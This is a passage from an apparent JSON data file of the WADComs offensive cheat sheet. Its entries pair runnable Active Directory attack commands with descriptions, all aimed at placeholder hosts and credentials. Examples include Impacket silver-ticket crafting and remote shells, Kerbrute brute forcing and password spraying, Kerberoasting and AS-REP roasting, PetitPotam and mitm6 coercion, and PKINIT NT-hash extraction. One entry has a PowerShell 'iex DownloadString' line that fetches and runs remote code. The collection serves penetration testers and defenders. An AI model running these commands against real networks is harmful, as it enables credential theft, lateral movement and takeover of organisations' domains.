list\n","mitre":[],"requires":["Password","Username"],"services":["RPC"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/services.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"]},{"id":"wadcoms:Impacket-SilverTicket","toolId":"wadcoms:Impacket-ticketer","toolName":"Impacket-ticketer","name":"Impacket-SilverTicket","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain test.local -dc-ip 10.10.10.1 -spn cifs/test.local john","description":"Impacket's ticketer.py can perform Silver Ticket attacks, which crafts a valid TGS ticket for a specific service using a valid user's NTLM hash. It is then possible to gain access to that service. The following command crafts a TGS for the SMB service, which can then be used to gain a shell.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: b18b4b218eccad1c223306ea1916885f\n\n\tDomain SID: S-1-5-21-1339291983-1349129144-367733775\n\n\tSMB Service: cifs\n","mitre":[],"requires":["Username","Hash"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Impacket-WMIExec","toolId":"wadcoms:Impacket-wmiexec","toolName":"Impacket-wmiexec","name":"Impacket-WMIExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 wmiexec.py test.local/john:password123@10.10.10.1","description":"Impacket's wmiexec.py uses the Windows Management Instrumentation (WMI) to give you an interactive shell on the Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["WMI"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#wmiexecpy"]},{"id":"wadcoms:Impacket-addcomputer-LDAPS","toolId":"wadcoms:Impacket-addcomputer","toolName":"Impacket-addcomputer","name":"Impacket-addcomputer-LDAPS","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 addcomputer.py -method LDAPS -dc-ip 10.10.10.1 -computer-pass TestPassword321 -computer-name testComputer test.local/john:password123","description":"Impacket's addcomputer.py will add a computer account to the domain and set its password. The following command will create a new computer over LDAPS. Plain LDAP is not supported, as it doesn't allow setting the password of the new computer.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tNew Computer Password: TestPassword123\n\n\tNew Computer Name: testComputer\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-addcomputer-SMB","toolId":"wadcoms:Impacket-addcomputer","toolName":"Impacket-addcomputer","name":"Impacket-addcomputer-SMB","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Persistence"],"nativeCategory":["Exploitation","Persistence"],"command":"python3 addcomputer.py -method SAMR -dc-ip 10.10.10.1 -computer-pass TestPassword321 -computer-name testComputer test.local/john:password123","description":"Impacket's addcomputer.py will add a computer account to the domain and set its password. The following command will create a new computer over the SMB by specifying the `SAMR` method.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tNew Computer Password: TestPassword123\n\n\tNew Computer Name: testComputer\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-atexec-Creds","toolId":"wadcoms:Impacket-atexec","toolName":"Impacket-atexec","name":"Impacket-atexec-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 atexec.py test.local/john:password123@10.10.10.1 whoami","description":"Impacket's atexec.py uses the Task Scheduler service on the remote Windows host to execute the given command. It will create a windows task with a random name, trigger the task, and then delete it. The following command executes `whoami` on the remote Windows host.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tCommand Executed: whoami\n","mitre":[],"requires":["Password","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1"]},{"id":"wadcoms:Impacket-atexec-Hash","toolId":"wadcoms:Impacket-atexec","toolName":"Impacket-atexec","name":"Impacket-atexec-Hash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 test.local/john@10.10.10.1 whoami","description":"Impacket's atexec.py uses the Task Scheduler service on the remote Windows host to execute the given command. It will create a windows task with a random name, trigger the task, and then delete it. The following command executes `whoami` on the remote Windows host, authenticating with the hash of user `john`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76\n\n\tCommand Executed: whoami\n","mitre":[],"requires":["Hash","Username"],"services":["SMB"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1"]},{"id":"wadcoms:Impacket-getST-Creds","toolId":"wadcoms:Impacket-getST","toolName":"Impacket-getST","name":"Impacket-getST-Creds","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123","description":"Impacket's getST.py will request a Service Ticket and save it as ccache. If the account has constrained delegation privileges, you can use the `-impersonate` flag to request a ticket on behalf of another user. The following command will impersonate the Administrator account and request a Service Ticket on its behalf for the `www` service on host `server01.test.local`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tService: www\n\n\tHost Name: server01.test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tImpersonated User: Administrator\n","mitre":[],"requires":["Username","Password"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-getST-Hash","toolId":"wadcoms:Impacket-getST","toolName":"Impacket-getST","name":"Impacket-getST-Hash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation","Persistence"],"nativeCategory":["Exploitation","PrivEsc","Persistence"],"command":"python3 getST.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john","description":"Impacket's getST.py will request a Service Ticket and save it as ccache. If the account has constrained delegation privileges, you can use the `-impersonate` flag to request a ticket on behalf of another user. The following command will impersonate the Administrator account using the hashed password of user `john` and request a Service Ticket on its behalf for the `www` service on host `server01.test.local`.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tService: www\n\n\tHost Name: server01.test.local\n\n\tUsername: john\n\n\tHash: :2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tImpersonated User: Administrator\n","mitre":[],"requires":["Hash","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"]},{"id":"wadcoms:Impacket-getTGT","toolId":"wadcoms:Impacket-getTGT","toolName":"Impacket-getTGT","name":"Impacket-getTGT","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 getTGT.py test.local/john -dc-ip 10.10.10.1 -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7","description":"Impacket's getTGT.py uses a valid user's NTLM hash to request Kerberos tickets, in order to access any service or machine where that user has permissions.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tHash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n","mitre":[],"requires":["Hash","Username"],"services":["Kerberos"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getTGT.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"]},{"id":"wadcoms:Kerbrute-BruteForce","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-BruteForce","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"cat credentials.txt | kerbrute_linux_amd64 -d test.local bruteforce -","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to brute force valid username and passwords logins given a list of credentials (in the format `username:password`).\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tCredential List: credentials.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:Kerbrute-BruteUser","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-BruteUser","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"kerbrute bruteuser -d test.local passwords.txt john","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will bruteforce an account against a list of provided passwords given a username.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tPassword List: passwords.txt\n\n\tUsername: john\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:Kerbrute-PasswordSpray","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-PasswordSpray","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"kerbrute passwordspray -d test.local domain_users.txt password123","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will perform a password spray account against a list of provided users given a password.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: domain_users.txt\n\n\tPassword: password123\n","mitre":[],"requires":["Username"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:Kerbrute-UserEnum","toolId":"wadcoms:Kerbrute","toolName":"Kerbrute","name":"Kerbrute-UserEnum","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"kerbrute userenum -d test.local usernames.txt","description":"ropnop's kerbrute bruteforces and enumerates valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to enumerate valid usernames given a list of usernames to try.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos"],"references":["https://github.com/ropnop/kerbrute"]},{"id":"wadcoms:LDAPSearch-Creds","toolId":"wadcoms:LDAPSearch","toolName":"LDAPSearch","name":"LDAPSearch-Creds","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"ldapsearch -h test.local -D 'ldap@test.local' -w password123 -b 'dc=test,dc=local'","description":"ldapsearch is a Linux based tool that opens a connection to an LDAP server, binds, and performs a search using specified parameters. The following command will attempt to find sensitive information (such as leaked creds), by querying all LDAP objects, essentially dumping all the data that an anonymous user can access.\n\nCommand Reference:\n\n\tDomain: test.local\n \n\tUsername: ldap\n \n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://linux.die.net/man/1/ldapsearch"]},{"id":"wadcoms:LDAPSearch-NoCreds","toolId":"wadcoms:LDAPSearch","toolName":"LDAPSearch","name":"LDAPSearch-NoCreds","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"ldapsearch -LLL -x -H ldap://test.local -b'' -s base '(objectclass=\\*)'","description":"ldapsearch is a Linux based tool that opens a connection to an LDAP server, binds, and performs a search using specified parameters. The following command will attempt to find sensitive information (such as leaked creds), by querying all LDAP objects, essentially dumping all the data that an anonymous user can access.\n\nCommand Reference:\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["LDAP"],"references":["https://linux.die.net/man/1/ldapsearch"]},{"id":"wadcoms:Mitm6","toolId":"wadcoms:Mitm6","toolName":"Mitm6","name":"Mitm6","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"mitm6 -d test.local --ignore-nofqnd","description":"mitm6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attackers host as default DNS server. The following command will respond to DHCPv6 messages and set the DNS server to the attack host IP. Leverage this command with ntlmrelayx.py to capture the WPAD configuration requests. \n\nCommand Reference:\n\n\tDomain: test.local\n","mitre":[],"requires":["No_Creds"],"services":["DNS"],"references":["https://github.com/dirkjanm/mitm6","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"]},{"id":"wadcoms:NetExec-Creds-coerce_plus","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Creds-coerce_plus","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery","Execution"],"nativeCategory":["Enumeration","Privilidge Escalation","Exploitation","Laterl movement"],"command":"nxc smb 10.10.10.1 -u john -p password123 -M coerce_plus","description":"\"NetExec (a.k.a nxc) is a network pentesting suite that has many modules that can be listed via nxc <protocol> -L. The coerece_plus module will enumarate a target ip, dnsname, list of targets or ip range for different coherence attacks. It will indicate in the output which a target is vulnrable to. Providing you also a means for exploit by adding where your listener/reciving system is(-LISTENER=10.10.10.1) and which exploit you want it to use. The module was recently updated 7 days ago to work on the latest windows build\"\n\n Command Reference:\n\n Target IP: 10.10.10.1\n\n Username: john\n\n Password: password123 \n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://blog.redteam-pentesting.de/2025/windows-coercion/","https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities"]},{"id":"wadcoms:NetExec-Enum-LDAP","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-LDAP","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nxc ldap 10.10.10.1 -u 'john' -p 'password123' --trusted-for-delegation --password-not-required --admin-count --users --groups","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate domain groups, local groups, users, user descriptions, users trusted for delegation, users without a password, You can also use CIDR notation to target a range of ip addresses (i.e. 10.10.10.0/24).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB-Anonymous","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Anonymous","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u 'a' -p ''","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate the SMB host using anonymous access. \n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB-Null","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Null","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u '' -p ''","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate the SMB host using a null session. \n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB-Relay-List","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB-Relay-List","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nxc smb smb_host.txt --gen-relay-list output.txt","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. The following command will enumerate a list of SMB hosts with signing not enforced, allowing you to relay credentials to them using ntlmrelayx.py.\n\nCommand Reference:\n\n\tSMB Hosts: smb_hosts.txt\n","mitre":[],"requires":["No_Creds"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Enum-SMB","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Enum-SMB","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nxc smb 10.10.10.1 -u 'john' -p 'password123' --groups --local-groups --loggedon-users --rid-brute --sessions --users --shares --pass-pol","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will enumerate domain groups, local groups, logged on users, relative identifiers (RIDs), sessions, domain users, SMB shares/permissions, and get the domain password policy. You can also use CIDR notation to target a range of ip addresses (i.e. 10.10.10.0/24).\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-Exec-SMB","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-Exec-SMB","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"nxc smb 10.10.10.1 -u 'john' -p 'password123' -X '$Host'","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will execute a powershell command on the target machine if the user has Administrator privileges. using \"-x\" will execute from cmd.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Username","Password"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-LDAP-ASREPRoasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-ASREPRoasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","AS-REP Roasting"],"command":"nxc ldap 10.10.10.1 -u users.txt -p '' --asreproast output.txt","description":"NetExec (formerly CrackMapExec) performs an AS-REP Roasting attack via the LDAP service.\nThis command attempts to enumerate domain accounts that do not require pre-authentication \nand requests Kerberos AS-REP responses for them. The extracted encrypted ticket-granting \nticket (TGT) hashes are saved into the specified file and can later be cracked offline \nto recover plaintext credentials.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tDomain: test.local\n\tUsername List: users.txt\n\tPassword: (empty string)\n\tOutput File: output.txt\n","mitre":["T1558.004"],"requires":["Username","Hash"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://attack.mitre.org/techniques/T1558/004/"]},{"id":"wadcoms:NetExec-LDAP-Kerberoasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-LDAP-Kerberoasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Kerberoasting"],"command":"nxc ldap 10.10.10.1 -u 'john' -p 'password123' --kerberoasting output.txt","description":"NetExec (formerly CrackMapExec) performs a Kerberoasting attack via the LDAP service.\nThis command authenticates with the given domain account, enumerates Service Principal Name (SPN) accounts, \nand extracts their Kerberos ticket hashes, saving them into the specified file.\nThe obtained hashes can later be cracked offline using brute force or wordlists.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tDomain: test.local\n\tUsername: john\n\tPassword: password123\n\tOutput File: output.txt\n","mitre":["T1558.003"],"requires":["Username","Password","Hash"],"services":["LDAP"],"references":["https://github.com/Pennyw0rth/NetExec","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast","https://attack.mitre.org/techniques/T1558/003/"]},{"id":"wadcoms:NetExec-SMB-Password-Spray","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Password-Spray","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"nxc smb 10.10.10.1 -u users.txt -p password123","description":"\"NetExec (a.k.a nxc) is a network service exploitation tool that helps automate assessing the security of large networks.\" - https://www.netexec.wiki/. This command will perform password spraying over SMB against the domain controller.\n\nCommand Reference:\n\n\tDomain Controller IP: 10.10.10.1\n\n\tUsername List: users.txt\n\n\tPassword: password123\n","mitre":[],"requires":["Username"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/"]},{"id":"wadcoms:NetExec-SMB-Timeroasting","toolId":"wadcoms:NetExec","toolName":"NetExec","name":"NetExec-SMB-Timeroasting","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Credential Access"],"nativeCategory":["Credential Access","Timeroasting"],"command":"nxc smb 10.10.10.1 -M timeroast","description":"NetExec (formerly CrackMapExec) performs a Timeroasting attack via the SMB service.\nThis command targets the remote Windows host and abuses the Kerberos protocol by \nmanipulating ticket lifetimes or requesting renewable service tickets. \nIt can help attackers obtain long-lived Kerberos tickets for offline cracking \nor later lateral movement.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\tModule: timeroast\n","mitre":[],"requires":["Hash","Username"],"services":["SMB"],"references":["https://github.com/Pennyw0rth/NetExec","https://cybersecurity.bureauveritas.com/blog/timeroasting-attacking-trust-accounts-in-active-directory"]},{"id":"wadcoms:Nmap-Krb5-Enum-Users","toolId":"wadcoms:Nmap","toolName":"Nmap","name":"Nmap-Krb5-Enum-Users","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='test.local',userdb=usernames.txt 10.10.10.1","description":"Nmap's `krb5-enum-users` script attempts to bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication. The following command will attempt to enumerate valid usernames given a list of usernames to try.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tDomain: test.local\n\n\tUsername List: usernames.txt\n","mitre":[],"requires":["No_Creds"],"services":["Kerberos","Enumeration"],"references":["https://nmap.org/download.html","https://nmap.org/nsedoc/scripts/krb5-enum-users.html"]},{"id":"wadcoms:PKINIT-getnthash","toolId":"wadcoms:PKINIT","toolName":"PKINIT","name":"PKINIT-getnthash","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"KRB5CCNAME=out.ccache python3 getnthash.py test.local/DC01\\$ -key 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773","description":"PKINIT getnthash.py request a TGS for yourself using Kerberos U2U. This will include with the PAC which in turn contains the NT hash that you can decrypt with the AS-REP key that you got from your TGT request using gettgtpkinit.py from PKINIT. Use the TGT from gettgtpkinit.py in your KRB5CCNAME env variable.\n\nCommand Reference:\n\n Domain: test.local\n\n Host that you got the TGT from: DC01\n\n TGT from gettgtpkinit.py: out.ccache\n\n AS-REP key: 6e63333c372d7fbe64dab63f36673d0cd03bfb92b2a6c96e70070be7cb07f773\n","mitre":[],"requires":["TGT"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"]},{"id":"wadcoms:PKINIT-gettgtpkinit","toolId":"wadcoms:PKINIT","toolName":"PKINIT","name":"PKINIT-gettgtpkinit","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["Exploitation","PrivEsc"],"command":"python3 gettgtpkinit.py test.local/DC01\\$ -cert-pfx crt.pfx -pfx-pass password123 out.ccache","description":"PKINIT gettgtpkinit.py request a TGT using a PFX file, either as file or as base64 encoded blob, or PEM files for cert+key. This uses Kerberos PKINIT and will output a TGT into the specified ccache. It will also print the AS-REP encryption key which you may need for the getnthash.py tool.\n\nCommand Reference:\n\n Domain: test.local\n\n Host that you got the certificate from: DC01\n\n PFX file: crt.pfx\n\n PFX file password: password123\n\n TGT requested: out.ccache\n","mitre":[],"requires":["Username","Password","PFX"],"services":["Kerberos"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"]},{"id":"wadcoms:PSADmodule-Kerbaroasting","toolId":"wadcoms:PSADmodule","toolName":"PSADmodule","name":"PSADmodule-Kerbaroasting","source":"WADComs","platform":["Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"Get-ADUser -Filter {ServicePrincipalName -ne \"$null\" -and Enabled -eq $true} -Properties ServicePrincipalName | select -ExpandProperty ServicePrincipalName | % { $spn = $_; Add-Type -AssemblyName System.IdentityModel; $ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn; $ticketBytes = $ticket.GetRequest(); $ticketBase64 = [System.Convert]::ToBase64String($ticketBytes); $account = (Get-ADUser -Filter {ServicePrincipalName -eq $spn} -Properties SamAccountName).SamAccountName; Write-Output \"===== $account : $spn =====`n$ticketBase64\" } | Out-File -FilePath \"kerberos_tickets.txt\" -Encoding ASCII","description":"Kerberoasting is the act of requesting service tickes for accounts that have an SPN set, and then attempting to crack those hashes offline. \nThis one liner using the powershell AD module serves less as a feasiable attack and more as a PoC that the AD module with some ingenuity\ncan be used to exploit many vectors within AD that you otherwise import tools that are not signed, need obfiscation, require AV/EDR bypass or other\nsteps that may trigger alerts.\n","mitre":[],"requires":["powershell"],"services":["Kerberos"],"references":["https://github.com/samratashok/ADModule"]},{"id":"wadcoms:PetitPotam","toolId":"wadcoms:PetitPotam","toolName":"PetitPotam","name":"PetitPotam","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"capability":["Execution"],"nativeCategory":["Exploitation"],"command":"python3 PetitPotam.py -d test.local -u john -p password123 10.10.10.2 10.10.10.1","description":"PetitPotam leverages the MS-EFSRPC API to connect to a Windows host, hijack the authentication session, and trigger an authentication from the target host to an attacker controlled host (usually SMB or HTTP server). This captured authentication can then be relayed to authenticate to other hosts and perform more attacks. See more in ntlmrelayx.py.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tAttacker IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n","mitre":[],"requires":["Password","Username"],"services":["RPC","NTLM"],"references":["https://github.com/topotam/PetitPotam","https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory"]},{"id":"wadcoms:Powershell-ADModule-enum","toolId":"wadcoms:Powershell","toolName":"Powershell","name":"Powershell-ADModule-enum","source":"WADComs","platform":["Windows"],"capability":["Discovery","Credential Access"],"nativeCategory":["Discovery","Credential Access"],"command":"iex (new-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1');Import-ActiveDirectory","description":"The Active Directory Module from powershell can be used to preform most needed enumaration tasks as well as some exploitation tasks revoling around ACL/DACL/Delegation abuse. The modules does not need to be installed on the target, it is signed by microsoft and thus greatly reduces the risk of detection and lastly works without restriction in constrained language mode(CLM). This entry focused on downloading and importing it in memory for a given session, one liners can be found in other entries of WADCOMs\n","mitre":[],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule","https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html"]},{"id":"wadcoms:PwshADmodule-DelegationAttack-Enum","toolId":"wadcoms:PwshADmodule","toolName":"PwshADmodule","name":"PwshADmodule-DelegationAttack-Enum","source":"WADComs","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Enumeration"],"command":"# 1. Unconstrained (turned on for all Domain controllers by default)\n(Get-ADForest).Domains | % { Get-ADComputer -Filter {TrustedForDelegation -eq 